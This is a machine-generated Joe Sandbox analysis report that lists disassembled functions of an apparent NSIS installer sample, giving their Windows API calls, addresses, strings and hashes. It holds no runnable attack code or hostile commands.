                                                      • Instruction ID: ce13e03cd45963b48540e15e7c975c75beca6294bacda27d7b2280c3fc44a057
                                                      • Opcode Fuzzy Hash: f9228c852270c76ef78ec2ca11ee776aa8e2f0e6cd55c43c8e62e95c72d82e91
                                                      • Instruction Fuzzy Hash: CA31B171D00124BBCF216FA5CE89D9EBE79EF49364F14423AF450762E1CB794C429B98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateDirectoryW.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405A8E
                                                      • GetLastError.KERNEL32 ref: 00405AA2
                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AB7
                                                      • GetLastError.KERNEL32 ref: 00405AC1
                                                      Strings
                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405A71
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                      • API String ID: 3449924974-2382934351
                                                      • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                      • Instruction ID: 6b4cde1861b350949670c47dbaa51c368922036badf300449d23a0f4a4187d7a
                                                      • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                      • Instruction Fuzzy Hash: D0010871D10219EADF109BA0C984BEFBFB4EB04314F04853AD545B6180D77896488FA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: CloseEnum$DeleteValue
                                                      • String ID:
                                                      • API String ID: 1354259210-0
                                                      • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                      • Instruction ID: c11aca49d0effc85046ccc9aadc56b913b01f210672418aaa5aa9f4d8e4c938e
                                                      • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                      • Instruction Fuzzy Hash: 8C212A7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21A0D7B59E54AA68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                      • GetClientRect.USER32(?,?), ref: 00401DE5
                                                      • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                      • DeleteObject.GDI32(00000000), ref: 00401E39
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: 132564bbd8200f7e0b28f89bf5610b7946a6e505595dff695356bd6c1208d134
                                                      • Instruction ID: 28669104e63112c2688ec1bf4ccd66a2dfd92d91aff3cd1988410ea650e2814b
                                                      • Opcode Fuzzy Hash: 132564bbd8200f7e0b28f89bf5610b7946a6e505595dff695356bd6c1208d134
                                                      • Instruction Fuzzy Hash: 1721F672D04119AFCB05DBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401E51
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                        • Part of subcall function 00406557: lstrcatW.KERNEL32(open cmd,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                                                        • Part of subcall function 00406557: lstrlenW.KERNEL32(open cmd,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                                                      • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                      • String ID:
                                                      • API String ID: 2584051700-0
                                                      • Opcode ID: 74636cf2ecc57cf3bcc44e22a8085c4cd552b452b46a4d91cdb067a33bc801f9
                                                      • Instruction ID: 0d45dbb9e622ade016cb62109ac663f1c9afcfae21dbc147df73c93619ae97e2
                                                      • Opcode Fuzzy Hash: 74636cf2ecc57cf3bcc44e22a8085c4cd552b452b46a4d91cdb067a33bc801f9
                                                      • Instruction Fuzzy Hash: 6401D871940641EFEB006BB4AE89BDA3FB0AF15301F10493AF141B61D2C6B90404DB2C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 7bcf9f063f3f8c1cd6765bc74cbc29e805e6a9181adc19e22c18985f917a49b0
                                                      • Instruction ID: f7a68e929e996113dc281fa05a4685e5ce16b579df1de56e4cd617e501a9a943
                                                      • Opcode Fuzzy Hash: 7bcf9f063f3f8c1cd6765bc74cbc29e805e6a9181adc19e22c18985f917a49b0
                                                      • Instruction Fuzzy Hash: 90219C7190421AEFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
                                                      • wsprintfW.USER32 ref: 00404DCD
                                                      • SetDlgItemTextW.USER32(?,007A1F48), ref: 00404DE0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s
                                                      • API String ID: 3540041739-3551169577
                                                      • Opcode ID: b63b375c52d9e39ea065d19b7d609cfd2a106d227f9d41c37452b91305e63ea2
                                                      • Instruction ID: 68f5f2c35a4a9d0707adcc228443cff0cbca91619b9e39d4db13cc85b0838dbb
                                                      • Opcode Fuzzy Hash: b63b375c52d9e39ea065d19b7d609cfd2a106d227f9d41c37452b91305e63ea2
                                                      • Instruction Fuzzy Hash: C911A5736041283BDB1065ADAC45EAE329C9F86334F250237FA66F71D5EA79981182E8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527
                                                        • Part of subcall function 00405E94: CharNextW.USER32(?,?,007A4750,?,00405F08,007A4750,007A4750,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C46,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405EA2
                                                        • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
                                                        • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF
                                                      • lstrlenW.KERNEL32(007A4750,00000000,007A4750,007A4750,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C46,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405F4A
                                                      • GetFileAttributesW.KERNEL32(007A4750,007A4750,007A4750,007A4750,007A4750,007A4750,00000000,007A4750,007A4750,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C46,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00405F5A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\$PGz
                                                      • API String ID: 3248276644-2826072134
                                                      • Opcode ID: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                                                      • Instruction ID: 6b34473ccab7fedc8ccd770ab5d77ed9e65f07289ecf91379f8b64e60d69f16d
                                                      • Opcode Fuzzy Hash: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                                                      • Instruction Fuzzy Hash: 64F0F43A105D5325D622333A5C09AAF1609CEC2328B19093FF992B22D1DB3CCA438D6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00405DEF
                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00405DF9
                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405E0B
                                                      Strings
                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405DE9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrcatlstrlen
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                      • API String ID: 2659869361-2382934351
                                                      • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                      • Instruction ID: 5df85f57ea55352fd9405ca64aeca33b709f52697b2ce94ac79c97851b919939
                                                      • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                      • Instruction Fuzzy Hash: 0BD05E31111A307BC1116B48AD04DDB629CAE85700381042AF141B20A5D778596286FD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040385A,?), ref: 0040302C
                                                      • GetTickCount.KERNEL32 ref: 0040304A
                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040385A,?), ref: 00403075
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                      • String ID:
                                                      • API String ID: 2102729457-0
                                                      • Opcode ID: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                                                      • Instruction ID: 88099082ea7d1cc716486b810d419c96650c49a7fc0f2dc261fb7bb284c478c3
                                                      • Opcode Fuzzy Hash: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                                                      • Instruction Fuzzy Hash: AEF08230502620AFC2216F50FD0898B7F78FB40B52745C47BF145F15A8CB3C09828B9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 0040551F
                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405570
                                                        • Part of subcall function 004044C2: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      • Opcode ID: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
                                                      • Instruction ID: 9d4fd90c1d1287ad01f41678c6dcc1ca6f3bae65868fe0495ea0105890a895ad
                                                      • Opcode Fuzzy Hash: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
                                                      • Instruction Fuzzy Hash: CC01BC71100648BFEF209F11ED80A9B3B27FB84390F548037FA057A2E5C77A8D529A69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,007A0F28,00000000,?,?,open cmd,?,?,0040664F,80000002), ref: 0040642E
                                                      • RegCloseKey.ADVAPI32(?,?,0040664F,80000002,Software\Microsoft\Windows\CurrentVersion,open cmd,open cmd,open cmd,00000000,007A0F28), ref: 00406439
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue
                                                      • String ID: open cmd
                                                      • API String ID: 3356406503-2392162428
                                                      • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                      • Instruction ID: 998e79ef7726f2f5777b90a8cc8b3066c283ada07cb0ab9722e08f3c700fe3cb
                                                      • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                      • Instruction Fuzzy Hash: D1017C72500209AEDF219F51CC09EDB3BB9EB54364F11803AFD1AA2191D738D968DBA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,771B3420,00000000,C:\Users\user~1\AppData\Local\Temp\,00403B0C,00403A3B,?), ref: 00403B4E
